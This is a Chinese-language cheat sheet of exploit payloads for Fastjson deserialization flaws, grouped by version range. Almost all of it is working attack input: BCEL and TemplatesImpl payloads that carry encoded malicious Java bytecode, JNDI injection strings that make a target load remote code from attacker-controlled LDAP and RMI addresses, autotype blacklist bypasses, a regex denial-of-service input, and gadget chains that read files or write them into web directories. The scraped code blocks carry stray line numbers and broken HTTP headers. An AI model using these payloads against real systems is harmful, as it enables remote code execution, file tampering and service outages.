9Tu$3bNo$d5z6ao$a1$cd$dc$9b0$e3$8e$8c$cfj$Y$c1e$N$8dx$b1$84$db$t$3a$e4E$5d$c3$GA$3ds$o$f4j$f8$i$dad$7c$5e$c3$d3$f8$82$868h$c4$X$f12$N_$S$cdKE$f3e$7cE$c3W$f15$a6$3e$c3$b9$de$U$v$cb$i$ba$813$Bzcrj$f8$3a$be1f$dd$c3$a8$8coj$f8$W$be$ad$a1$J$cd$y3$Z$A8F$f3$cc$f0$93$b0$e0$ff$A$9f$84$db$s$80$9e$E$d9$8aW$c5$88$3a$Z$df$d1$f0$5d$7cO$c3$f7$f1$MkH_$q$d6i$f5$J$bf$fc$80$c9$b8n$f5$G$c2dS$7bC$e5$5d$9eG$3c8$8e$da1$W$a4c$m$Q6$f4X$cc$b4e$fcP$c3$V$fcH$c3$8f$f1$T$Z$3f$d5$f03$fc$5c$40$e7$X$84$fb$8e$3a$N$bf$c4$af4$fc$g$cfhx$W$bf$d1$f0$5b$81$a9$df$89$e6$f7$f8$D$f1$a8$e1$8f$f8$93$86$3f$e3$_$g$fe$8a$bf$J$a8$e9$94$be$7d$7c$z$d0$f0w$R$bb$7f$e09$a6$de$84$b5$89$85b$fbM2$a3$f0$F$b6$98$9e$Z$ab$3a$9d$T$e5$m$F$8ey$a5$e3kwY$86r$3f$b9W8$cf$z$91$ed$b6n$98c$e0$d3$dem$T$7dLh$pa$dbf$cc$Z$9dO$zMg$e5$ad$92$97b$d0F$3d$S$a3x$9f$deI$3a$85$d1J$e93$a54$93$f4$fcH$bc$$$k$X$f7$hKs$83m$f5$I$de$e3$e8DM$W$81$f7$A$qaU$G$db$b6$8f$3fu$b3$w$3c$fd$85$f6$I$bf$I1$bd$87$8eX$96$a1$dag$IzY$a6$bb0$3d7$P$c4$j$b3$c7$bb$pZm$ab$d7$b4$9d$D$y$x$T$c4$e7$fau$9b$ebXMV$9fi$d7$eb$e2j$Z$eb$f9$ebD$rc$9c$c6z$k$W$b5$yf$98$ae$ef$K$fe$b7$d7$96$889$RQ$e7Uqc$8dNBc$b8$a6$96$c5$3dk$ee7$N$be$3a$s$d0$95V$89JQ$3bFRjQ$c2$qJj$8c$f5$s$I2$e2$84$8e$u$i$95$c6$d4M$db$e0$f1$f2$d2$8c$h$Z$a4$f3$ce$d5$Sqs$8d$Z$8d$f4xy$7f$T$r$d3$8b$81$b0$wf$ee$e7$8d$p$bb$c8$8f$c6nx$H$a4I$I$ec$8a$s$e2$bc$ea$CF$d4$S$ce$_$a0$rk$d2$af6Z7$a3$b4$ecfI$9c$c7$8b$d5$ab$a3$R$f7$89$e3$_$dd$s8$fb$c8$e9$G$M$dc$MM2$d3$c4$b6$f5$D$ee$b3$8a$B$cd$e3$f1p$82H2$bc$e4$K$89$3cc$ee$d1$ae1$F$a1h$7c$d2$a5$5e$80$98$c5gh1$9f$e52$UqCB$c2Z$ce$b2$d0$c09$_K$8e$Vq$ff$b9$fd$86T$cf$db$c3$edy$df$ba$7d$ab$db$Hx$96$d70$db0gI$f2$c8b$bf$bc$fc$i$qi$IY$fc$7c$X$e0$dfz$O$81$nd$PB$O$wI$e4$MA$V$c3$5cw$a8$N$40iZ$90$c4$a4aL$f6$N$p$ff$yyMC$F$l$d4y$f0$a1$9d$dc$aa$90$cbv2$9f$fc$F$94$h$84$86$v$a4$I$d1$KAWD$caB$y$e4$83$7d$JJP$8b$Z$d8D$eai$d4c$nOl$c6$W$f2$a3F$b8$H$5b$d9o$e3$97$8f$ac$e7yH$92$b1$5d4$3b$fcP$c5$dd$cb$Ta$97$o$cb$3dQ$5c$3e$82$bcAd$97$tQp$M$B$ff$Zo$i$dc$e2$3b$c3$5dO$b3$m$r$A$b7a$S$ffS$e4c$Ou$98$ebJ$d7$3c$Ox$b9$eb$p$n$d3$8f$acI$Sv$K$8fI$5c$GE$f2$o$f1Df$3d$82l$c1H$aa$y$c9_r$g$93$H$915$o$3c$e4$h$81$ffl$f90$a6$i$97B$5c$bb$8c$87$G$a1R$85$a9I$84$8e$e1$409$fd$cb$85$e04$ffS$u$dc$ea$LN$P$tQT$ceI1$t$r$9c$cc$b8$84$e9C$b8e$Q$b7$5c$86$w$a21$802$f2$n$83$e0$ad$3e$9e$nys$F$X8$$$s5C$c5P4$7b$84$8b$9b$x$92$985$80r$d1$cf$Z$c0l$d1$cf$h$401$d5$ba$8c$a9$83$d0$ae$x$oS$R$9f$abs$b7$absG$f0$f6a$ccO$a24X$96D$f91$u$c1$F$D$I$E$x$9ay$uX$99$SL$ca$94$d8K$a8j$a9$bc$80$ea$ad$c3XHU$93X$94$c4$e2$8asxQpI$Sw$q$b14$89$3b$x$93$b8$8b$df$b2$B$f8$9b$cf$96$97$f8w$ba8$J$a0$D$P$e0$m$fd$bf$I$P$e3Q$c6$40$f4G$f8$bfN$f4$t$Y$8b$Ri$a64$87$fb$5e$b4$k$e7$K0$9fQ$x$r$82$ca$Z$9f$F$a8$q$82$W$R$M$9b$88$96$ed$iu$e0$O$d8XJ$be$b5$e4$7c$t$fa$b1$8c$bc$ea$c9$fdn$i$c2$K$3c$c6$f1$R$ac$c4Q$ac$c2$T$i$9f$40$jN2$9b$9e$e4$f84$b3$u$c9$i$3a$cf$8c$Za$be$5ca$c6$5cE$8b4$9d$8f$d3$Zh$95f$oLm$da$a4$b9h$97$e6a$8bTAD$K$b4$ec$40$OeN$a2l$83$80$e8wQ$db$c9$d1$nwdrt$d4$j$ed$e2$e8$a4$3b$ea$e2$e8$K$a5vSB$We$94$o$82$dd$b4$92$Q$c2$k$Xsb$UE$Pq$u$d0W$8a$fc$m$fe$85$96$9d2b$fe$d52$acu2z$f9$ed$95$a7$cd$ac$93a$3f$87$b5$dc$Ba$u$Q$9a$93E$s$e0q$81$d2$f8$uJ$a5$7b$d8k$5c$eb$X$91$Xp$a8i$a9$bc$b8$d4$ef$5b$g$I$FB$feS0$xC$81$c55$d9E$d9$fe$qj$a5$g$b9H$a4$cbr$f6$b2$8b$94$bb$8fC$x$92K$86$b1b$A$d5E$f2$r$ac$e4$afF$vR$$$$$cd$f1$zUCj$u$e7$U$a6$V$v$nuqMnQ$ae$m$ecW$a5$81$e7$9f$rxj$94$fe$A$87$c7$vt$d5$d6$e6$cb$cf$3f$u$8a$c4$7cXt$dbhpW3$B$85$x$DL$e4$5b$99asi$ca$7c$ba$b4$9a$ae$ac$a1$T$eb$e94$83$O$8b$b0$b7h$abM$e78$a4$bd$X$7bq$lg$H9$T$c1XA$t$Y$fc$i$ba1$97$i$9a$5d$87$ca$e4$b9$Z$J$ec$e3$O$3d$80$3e$cf$c9$iyN$O$e0$7e$ecg$d8$b3$5cwWA$f97$C2$O$5cC$ae$8c$7b$r$e9$3fX$q$e3$3e$Z$af$b8$86$C$Z$x$r$e9$w$8a$Y$86$d8$3f$c1Q$60$d4$e9$7d$v$a7$xx$e5$f5$8a$3a$db$ad$q$M$E$abc$SuC$90$cf$8a$e0$ba$sg$bb$7b$K$dbW$b9$d5$fb$fe$ff$Ctz$ebem$R$A$A" } } : "x" }
Fastjson 1.2.33-1.2.47 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 POST /json HTTP/1.1 : 127.0 .0 .1 : 9092 : application/json: whoami: 3647 { "xx" : { "@type" : "java.lang.Class" , "val" : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource" } , "x" : { "name" : { "@type" : "java.lang.Class" , "val" : "com.sun.org.apache.bcel.internal.util.ClassLoader" } , { "@type" : "com.alibaba.fastjson.JSONObject" , "c" : { "@type" : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource" , "driverClassLoader" : { "@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader" } , "driverClassName" : "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$cb$5b$TW$U$ff$5dH27$c3$m$g$40$Z$d1$wX5$a0$q$7d$d8V$81Zi$c4b$F$b4F$a5$f8j$t$c3$85$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea$7fP$7bnf$C$89$d0$afeq$ee$bd$e7$fe$ce$ebw$ce$9d$f0$cb$df$3f$3e$Ap$I$df$aaHbX$c5$IF$a5x$9e$e3$a8$8a$Xp$8ccL$c1$8b$w$U$e4$U$iW1$8e$T$i$_qLp$9c$e4x$99$e3$94$bc$9b$e4$98$e2$98VpZ$o$cep$bc$c2qVE$k$e7Tt$e2$3c$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f1$9a$U$af$ab0PP$b1$h$s$c7$9c$5c$85$U$f3$i$L$iE$F$96$82E$86$c4$a8$e5X$c1Q$86$d6$f4$c0$F$86X$ce$9d$T$M$j$93$96$p$a6$x$a5$82$f0$ce$Z$F$9b4$7c$d4$b4$pd$7b$3e0$cc$a5$v$a3$5c$bb$a2j$U$yQ$z$94$ac$C$9b$fc2$a8y$b7$e2$99$e2$84$r$z$3b$f2e$cfr$W$c6$cd$a2$9bY4$96$N$N$H1$a4$a0$a4$c1$81$ab$a1$8ck$M$a3$ae$b7$90$f1k$b8y$cf$u$89$eb$ae$b7$94$b9$$$K$Z$d3u$C$b1$Sd$3cq$ad$o$fc$ms6$5cs$a1z$c2$b5$e7$84$a7$c0$d3$e0$p$60$e8Z$QA$84$Y$L$C$cf$wT$C$e1S$G2l$d66$9c$85l$ce6$7c_C$F$cb$M$9b$d7$d4$a7$L$8b$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e6$93$X$de$b2$bda$d0$b6Z$$$7e$d9u$7c$oA$5d$cb$8ca$a7$M$bc$92$f1C$db5$lup$92$c03$9e$V$I$aa$eb$86$ccto$b3A1$I$ca$99$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY$88$867$f0$s$f5$d9$y$cd1$u$ae$9fq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D$86$96$acI$b0l$c1r$b2$7e$91$8eC$a6$86$P$f1$R$e9$q$z$81$ed0l$a9$85$a8$E$96$9d$cd$9b$86$e3$c8V$7c$ac$e1$T$7c$aa$e13$7c$ae$e0$a6$86$_$f0$a5l$f8W$e4$e1$f2$98$86$af$f1$8d$86$5b2T$7c$de$aeH$c7q$d3ve$d1$9dk$f9$8e$af$98$a2$iX$$$85$e85$ddRv$de$f0$83E$dfu$b2$cb$V$8a$b4$3aM$M$3dk6$9e$98$b7$a9$85$d9$v$R$U$5d$w$b0$f3$d2$e4$a3$E$8c4$91r$ae$e8$RS4$cdf$c5$f3$84$T$d4$cf$5d$e9$81$c9GQd$d9M$d4FSW$9b$a1I7$a4Yo$827$5cI$9b$N$_$a8M6mj$gjmz$7d$9e$eb$3c$8e$84$ad$ad$d7vl$D$9bK$ebl$g$bd4$b3C$ee$S$96$b3$ec$$$R$edG$g$7d$85$cf$a0$c9W$a4$gX$af$a2$feSN$c7$85i$h$9e$98$ab$e7$d6$ee$8b$60$cc4$85$ef$5b$b5$efF$y$7dQ$7eW$g$a7$f1$86$l$88R$f8$40$cexnYx$c1$N$86$7d$ff$c1$c3j$L$db$C$f7$7c$99$8cr$86$9c$9a$e6n$ad$82$b8$7c$a7$86$e5$Q$c1$bd$8d$8esE$c3$cb$cb$d7$e2$98bd$e0$o$Be$5b$c3Nt$ae$ef$e4H$7d$c6k$aa$b3$V$t$b0J$f5$c7$5c$3ft7$99Ej2$8c$89$VA$_$u$9d$de$60$Q$h$z$88$C$c9Vs$a8H$c9$b0$89B$9dt$ca$95$80$y$85A$acm$ab$87$b3$dcl$c3$F$99$f7$a47$bc$90$eck$V_$i$X$b6U$92$df$U$86$fd$ff$ceu$e3c$96E84$ef$e8$c3$B$fa$7d$91$7f$z$60$f2$ebM2C$a7$9d$b42Z$e3$83w$c1$ee$d0$86$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa$88$9f$gL$rZ$efC$a9$82O$k$60$b4KV$a1NE$80$b6$Q$a0$d5$B$83$a9$f6h$3b$7d$e0$60$84$j$8e$N$adn$e3$91$dd$s$b2Ku$84$d0$cd$c3$89H$bbEjS1$d2$ce$b6$a6$3a$f3$f2J$d1$VJ$a2KO$84R$8f$d5$3dq$5d$d1$e3$EM$S$b4$9b$a0$ea$cf$e8$iN$s$ee$93TS$5b$efa$5b$V$3d$v$bd$8a$ed$df$p$a5$ab$S$a3$ab$b1To$fe6$3a$e4qG$ed$b8$93d$5cO$e6u$5e$c5c$a9$5d$8d$91u$k$3a$ff$J$bbg$ef$a1OW$ab$e8$afb$cf$5d$3c$9e$da$5b$c5$be$w$f6$cb$a03$a1e$3a$aaD$e7Qz$91$7e$60$9d$fe6b$a7$eeH$e6$d9$y$bb$8cAj$95$ec$85$83$5e$92IhP$b1$8d$3a$d0G$bb$n$b4$e306$n$87$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC7$7e$c0VP$a9x$80$k$fc$K$j$bfa$3b$7e$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a5$88$7b$d8$V$ec$c7$93$U$edY$c4$k$S$b8M$c1S$K$9eVp$a8$$$c3M$b8$7fF$n$i$da$k$c2$93s$a3$e099$3d$87k$pv$e4$l$3eQL$40E$J$A$A" } } : "xxx" } }
1.2.33<=fastjson<=12.36
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 { "name" : { "@type" : "java.lang.Class" , "val" : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource" } , "x" : { "name" : { "@type" : "java.lang.Class" , "val" : "com.sun.org.apache.bcel.internal.util.ClassLoader" } , { "@type" : "com.alibaba.fastjson.JSONObject" , "c" : { "@type" : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource" , "driverClassLoader" : { "@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader" } , "driverClassName" : "$$BCEL..." } } : "ddd" } }
1.2.37<=fastjson<=1.2.47
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 { "name" : { "@type" : "java.lang.Class" , "val" : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource" } , "x" : { "name" : { "@type" : "java.lang.Class" , "val" : "com.sun.org.apache.bcel.internal.util.ClassLoader" } , "y" : { "@type" : "com.alibaba.fastjson.JSONObject" , "c" : { "@type" : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource" , "driverClassLoader" : { "@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader" } , "driverClassName" : "$$BCEL$.." , "$ref" : "$.x.y.c.connection" } } } }
其他
1 2 3 4 5 6 7 8 9 10 11 { "@type" : "org.apache.ibatis.datasource.unpooled.UnpooledDataSource" , "key" : { "@type" : "java.lang.Class" , "val" : "com.sun.org.apache.bcel.internal.util.ClassLoader" } , "driverClassLoader" : { "@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader" } , "driver" : "$$BCEL$$xxxxxxx" }
TemplatesImpl
利用条件苛刻,可用于解决不出网利用。parseObject()方法时,加入Feature.SupportNonPublicField参数。
1 { "@type" : "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl" , "_bytecodes" : [ "yv66vgAAADQAJgoABwAXCgAYABkIABoKABgAGwcAHAoABQAXBwAdAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMHAB4BAAl0cmFuc2Zvcm0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAfAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYHACABAApTb3VyY2VGaWxlAQALVEVNUE9DLmphdmEMAAgACQcAIQwAIgAjAQASb3BlbiAtYSBDYWxjdWxhdG9yDAAkACUBAAZURU1QT0MBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAHAAAAAAAEAAEACAAJAAIACgAAAC4AAgABAAAADiq3AAG4AAISA7YABFexAAAAAQALAAAADgADAAAACwAEAAwADQANAAwAAAAEAAEADQABAA4ADwABAAoAAAAZAAAABAAAAAGxAAAAAQALAAAABgABAAAAEQABAA4AEAACAAoAAAAZAAAAAwAAAAGxAAAAAQALAAAABgABAAAAFgAMAAAABAABABEACQASABMAAgAKAAAAJQACAAIAAAAJuwAFWbcABkyxAAAAAQALAAAACgACAAAAGQAIABoADAAAAAQAAQAUAAEAFQAAAAIAFg==" ] , "_name" : "a.b" , "_tfactory" : { } , "_outputProperties" : { } , "_version" : "1.0" , "allowedProtocols" : "all" }
c3p0#WrapperConnectionPoolDataSource
可用于解决不出网利用。
1 2 3 4 5 6 7 8 9 10 11 12 13 POST /json HTTP/1.1 : 127.0 .0 .1 : 8999 : 1 : Mozilla/5.0 (Windows NT 10.0 ; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0 .3770 .142 Safari/537.36 : text/html, application/xhtml+xml, application/xml;q=0.9 , image/webp, image/apng, *
Fastjson 1.2.25-1.2.41 1.2.25后将TypeUtils.loadClass替换为checkAutoType()函数,增加了黑名单和白名单。
1.2.25黑名单
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 bsh
exp
1 { "@type" : "Lcom.sun.rowset.JdbcRowSetImpl;" , "dataSourceName" : "ldap://localhost:1389/badNameClass" , "autoCommit" : true }
Fastjson 1.2.25-1.2.42 从1.2.42版本开始,把之前的明文黑名单,改为hash黑名单。https://github.com/LeadroyaL/fastjson-blacklist
1 { "@type" : "LLcom.sun.rowset.JdbcRowSetImpl;;" , "dataSourceName" : "ldap://localhost:1389/badNameClass" , "autoCommit" : true }
Fastjson 1.2.25-1.2.43 exp
1 { "@type" : "[com.sun.rowset.JdbcRowSetImpl" [ { , "dataSourceName" : "ldap://localhost:1389/badNameClass" , "autoCommit" : true }
Fastjson 1.2.25-1.2.45 条件需要开启autotype
1 { "@type" : "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory" , "properties" : { "data_source" : "ldap://localhost:1389/badNameClass" } }
Fastjson 1.2.25-1.2.47 通杀 借助缓存进行通杀,缓存在1.2.48被改为默认关闭
1.2.25-1.2.32版本:未开启AutoTypeSupport时能成功利用,开启AutoTypeSupport不能利用
1.2.33-1.2.47版本:无论是否开启AutoTypeSupport,都能成功利用
poc:
1 2 3 4 5 6 7 8 9 10 11 { "a" : { "@type" : "java.lang.Class" , "val" : "com.sun.rowset.JdbcRowSetImpl" } , "b" : { "@type" : "com.sun.rowset.JdbcRowSetImpl" , "dataSourceName" : "ldap://localhost:1389/badNameClass" , "autoCommit" : true } }
1.2.48之后版本,小弟水平有限还未复现研究,payload需要注意的细节还未探索
Fastjson 1.2.36-1.2.62 正则表达式拒绝服务漏洞
1 2 3 4 5 6 { "regex" : { "$ref" : "$[\blue = /\^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$/]" } , "blue" : "aaaaaaaaaaaaaaaaaaaaaaaaaaaa!" }
1 2 3 4 5 6 { "regex" : { "$ref" : "$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']" } , "blue" : "aaaaaaaaaaaaaaaaaaaaaaaaaaaa!" }
Fastjson 1.2.5 <= 1.2.59 需要开启AutoType
1 2 { "@type" : "com.zaxxer.hikari.HikariConfig" , "metricRegistry" : "ldap://localhost:1389/Exploit" } { "@type" : "com.zaxxer.hikari.HikariConfig" , "healthCheckRegistry" : "ldap://localhost:1389/Exploit" }
Fastjson 1.2.5 <= 1.2.60 需开启 autoType:
1 2 3 { "@type" : "oracle.jdbc.connector.OracleManagedConnectionFactory" , "xaDataSourceName" : "rmi://10.10.20.166:1099/ExportObject" } { "@type" : "org.apache.commons.configuration.JNDIConfiguration" , "prefix" : "ldap://10.10.20.166:1389/ExportObject" }
Fastjson 1.2.5 <= 1.2.61 1 { "@type" : "org.apache.commons.proxy.provider.remoting.SessionBeanProvider" , "jndiName" : "ldap://localhost:1389/Exploit" , "Object" : "a" }
Fastjson <1.2.62
需要开启AutoType;
Fastjson <= 1.2.62;
JNDI注入利用所受的JDK版本限制;
目标服务端需要存在xbean-reflect包;1 2 3 { "@type" : "org.apache.xbean.propertyeditor.JndiConverter" , "AsText" : "rmi://127.0.0.1:1098/exploit" } { "@type" : "org.apache.cocoon.components.slide.impl.JMSContentInterceptor" , "parameters" : { "@type" : "java.util.Hashtable" , "java.naming.factory.initial" : "com.sun.jndi.rmi.registry.RegistryContextFactory" , "topic-factory" : "ldap://localhost:1389/Exploit" } , "namespace" : "" }
fastjson<=1.2.66 前提条件
开启AutoType;
Fastjson <= 1.2.66;
JNDI注入利用所受的JDK版本限制;
org.apache.shiro.jndi.JndiObjectFactory类需要shiro-core包;
br.com.anteros.dbcp.AnterosDBCPConfig类需要Anteros-Core和Anteros-DBCP包;
com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig类需要ibatis-sqlmap和jta包;
1 2 3 4 5 6 7 8 9 10 11 12 { "@type" : "org.apache.shiro.jndi.JndiObjectFactory" , "resourceName" : "ldap://192.168.80.1:1389/Calc" } { "@type" : "org.apache.shiro.realm.jndi.JndiRealmFactory" , "jndiNames" : [ "ldap://localhost:1389/Exploit" ] , "Realms" : [ "" ] } { "@type" : "br.com.anteros.dbcp.AnterosDBCPConfig" , "metricRegistry" : "ldap://192.168.80.1:1389/Calc" } { "@type" : "br.com.anteros.dbcp.AnterosDBCPConfig" , "healthCheckRegistry" : "ldap://localhost:1389/Exploit" } { "@type" : "org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup" , "jndiNames" : "ldap://192.168.80.1:1389/Calc" } { "@type" : "com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig" , "properties" : { "@type" : "java.util.Properties" , "UserTransaction" : "ldap://192.168.80.1:1399/Calc" } }
适用于jdk11以上版本的写文件的payload:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 { "@type" : "java.lang.AutoCloseable" , "@type" : "sun.rmi.server.MarshalOutputStream" , "out" : { "@type" : "java.util.zip.InflaterOutputStream" , "out" : { "@type" : "java.io.FileOutputStream" , "file" : "/tmp/asdasd" , "append" : true } , "infl" : { "input" : { "array" : "eJxLLE5JTCkGAAh5AnE=" , "limit" : 14 } } , "bufLen" : "100" } , "protocolVersion" : 1 }
fastjson<=1.2.67 前提条件
开启AutoType;
Fastjson <= 1.2.67;
JNDI注入利用所受的JDK版本限制;
org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup类需要ignite-core、ignite-jta和jta依赖;
org.apache.shiro.jndi.JndiObjectFactory类需要shiro-core和slf4j-api依赖;1 2 3 { "@type" : "org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup" , "jndiNames" : [ "ldap://localhost:1389/Exploit" ] , "tm" : { "$ref" : "$.tm" } } { "@type" : "org.apache.shiro.jndi.JndiObjectFactory" , "resourceName" : "ldap://localhost:1389/Exploit" , "instance" : { "$ref" : "$.instance" } }
fastjson<=1.2.68
Fastjson <= 1.2.68;
利用类必须是expectClass类的子类或实现类,并且不在黑名单中;1 2 3 { "@type" : "org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig" , "metricRegistry" : "ldap://localhost:1389/Exploit" } { "@type" : "org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig" , "healthCheckRegistry" : "ldap://localhost:1389/Exploit" } { "@type" : "com.caucho.config.types.ResourceRef" , "lookupName" : "ldap://localhost:1389/Exploit" , "value" : { "$ref" : "$.value" } }
无需开启AutoType,直接成功绕过CheckAutoType()的检测从而触发执行:
1 { "@type" : "java.lang.AutoCloseable" , "@type" : "vul.VulAutoCloseable" , "cmd" : "calc" }
读文件
1 { "@type" : "java.lang.AutoCloseable" , "@type" : "org.eclipse.core.internal.localstore.SafeFileOutputStream" , "tempPath" : "C:/Windows/win.ini" , "targetPath" : "D:/wamp64/www/win.txt" }
写文件
1 2 3 4 5 6 { "@type" : "java.lang.AutoCloseable" , "@type" : "java.io.FileOutputStream" , "file" : "/tmp/nonexist" , "append" : "false" }
1 2 3 4 5 6 { "@type" : "java.lang.AutoCloseable" , "@type" : "java.io.FileWriter" , "file" : "/tmp/nonexist" , "append" : "false" }
写文件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 { "stream" : { "@type" : "java.lang.AutoCloseable" , "@type" : "org.eclipse.core.internal.localstore.SafeFileOutputStream" , "targetPath" : "D:/wamp64/www/hacked.txt" , "tempPath" : "D:/wamp64/www/test.txt" } , "writer" : { "@type" : "java.lang.AutoCloseable" , "@type" : "com.esotericsoftware.kryo.io.Output" , "buffer" : "cHduZWQ=" , "outputStream" : { "$ref" : "$.stream" } , "position" : 5 } , "close" : { "@type" : "java.lang.AutoCloseable" , "@type" : "com.sleepycat.bind.serial.SerialOutput" , "out" : { "$ref" : "$.writer" } } }
写文件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 { : { : "java.lang.AutoCloseable" , : 'java.io.FileOutputStream', : '/tmp/nonexist', : false } , : { : "java.lang.AutoCloseable" , : 'org.apache.solr.common.util.FastOutputStream', : 'SSBqdXN0IHdhbnQgdG8gcHJvdmUgdGhhdCBJIGNhbiBkbyBpdC4=', : { : '$.stream'} , : 38 } , : { : "java.lang.AutoCloseable" , : 'org.iq80.snappy.SnappyOutputStream', : { : '$.writer'} } }
适用于jdk8/10的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 { "@type" : "java.lang.AutoCloseable" , "@type" : "sun.rmi.server.MarshalOutputStream" , "out" : { "@type" : "java.util.zip.InflaterOutputStream" , "out" : { "@type" : "java.io.FileOutputStream" , "file" : "dst" , "append" : "false" } , "infl" : { "input" : "eJwL8nUyNDJSyCxWyEgtSgUAHKUENw==" } , "bufLen" : 1048576 } , "protocolVersion" : 1 }
jdk 8
position写入的长度,必须和base64编码前的长度一致。1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 { "stream" : { "@type" : "java.lang.AutoCloseable" , "@type" : "org.eclipse.core.internal.localstore.SafeFileOutputStream" , "targetPath" : "f:/pwn.txt" , "tempPath" : "" } , "writer" : { "@type" : "java.lang.AutoCloseable" , "@type" : "com.esotericsoftware.kryo.io.Output" , "buffer" : "YjF1M3I=" , "outputStream" : { "$ref" : "$.stream" } , "position" : 5 } , "close" : { "@type" : "java.lang.AutoCloseable" , "@type" : "com.sleepycat.bind.serial.SerialOutput" , "out" : { "$ref" : "$.writer" } } }
写文件,来自@W.K修改
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 { "x" : { "@type" : "com.alibaba.fastjson.JSONObject" , "input" : { "@type" : "java.lang.AutoCloseable" , "@type" : "org.apache.commons.io.input.ReaderInputStream" , "reader" : { "@type" : "jdk.nashorn.api.scripting.URLReader" , "url" : "http://127.0.0.1:8083/test.txt" } , "charsetName" : "UTF-8" , "bufferSize" : 10000 } , "branch" : { "@type" : "java.lang.AutoCloseable" , "@type" : "org.apache.commons.io.output.WriterOutputStream" , "writer" : { "@type" : "org.apache.commons.io.output.FileWriterWithEncoding" , "file" : "/tmp/files/12345" , "encoding" : "UTF-8" , "append" : true } , "charset" : "UTF-8" , "bufferSize" : 8193 , "writeImmediately" : true } , "trigger" : { "@type" : "java.lang.AutoCloseable" , "@type" : "org.apache.commons.io.input.XmlStreamReader" , "is" : { "@type" : "org.apache.commons.io.input.TeeInputStream" , "input" : { "$ref" : "$.input" } , "branch" : { "$ref" : "$.branch" } , "closeBranch" : true } , "httpContentType" : "text/xml" , "lenient" : false , "defaultEncoding" : "UTF-8" } } }
2021黑帽大会腾讯玄武披露https://b1ue.cn/archives/506.html
